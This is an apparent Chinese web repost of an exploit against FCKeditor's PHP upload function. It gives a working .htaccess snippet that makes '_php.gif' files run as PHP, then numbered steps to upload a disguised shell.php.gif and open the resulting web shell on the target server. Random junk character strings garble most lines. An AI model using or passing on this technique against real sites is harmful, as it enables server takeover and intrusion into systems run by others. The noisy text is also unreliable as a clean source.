FCKeditor所有php版本Upload上传漏洞
6 w i' I4 N+ @) S+ ]作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:077 E1 ~$ }7 N% i& ~) [+ m
减小字体 增大字体& E5 \0 {; }* g5 y- G+ u% K
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability- y5 F U" r' _) p9 g
[+] Date: 2011
3 Y! }2 T) O0 X0 e3 w2 v[+] Author : sinesafe.cn0 G+ j" L6 x9 o! ^4 \5 \
[+] Website : WwW.sinesafe.cn
5 D2 @7 w8 d0 I8 n8 l' H9 O. C) ]———————————————————4 }* c! `& J) `, p
1.create a htaccess file:
& \) _- ~2 A4 N1 |6 Fcode:* s4 k7 S+ m- P* f" w2 r
<FilesMatch “_php.gif”>; ?" \# \/ V1 ]$ F4 [. Z$ c
SetHandler application/x-httpd-php
* m: h( N. D3 q" P</FilesMatch>
! E8 s: S" S, a8 E4 Z0 F
0 Y8 U; q0 O. o/ ]* S+ d: d2.Now upload this htaccess with FCKeditor.
" W" V. D9 }6 A! t3 v3 K3 c" r% Q' U' c: X2 f
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html
' C7 R: ^6 V3 A- C) \4 G
; V- D; f6 r* W* Ihttp://www.sinesafe.cn/FCKeditor ... onnectors/test.html9 w0 i: q, Z4 l" _
# r& l1 y3 u1 V3 T1 {* m `8 I" b———————————————————————————————-
2 J5 f% d& ?6 w$ P8 e3.Now upload shell.php.gif with FCKeditor.: e: g9 Z$ }8 j8 E+ C
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
/ ]' v1 G1 q5 |# c, b5.http://www.sinesafe.cn/anything/shell_php.gif
+ i. @! e: M, j' {/ r* u3 @4 l; C6.Now shell is available from server. |
5 c( O& y! i- g+ w* K/ k
d* F9 F+ s5 Q/ r
0 c4 s9 c- z5 a |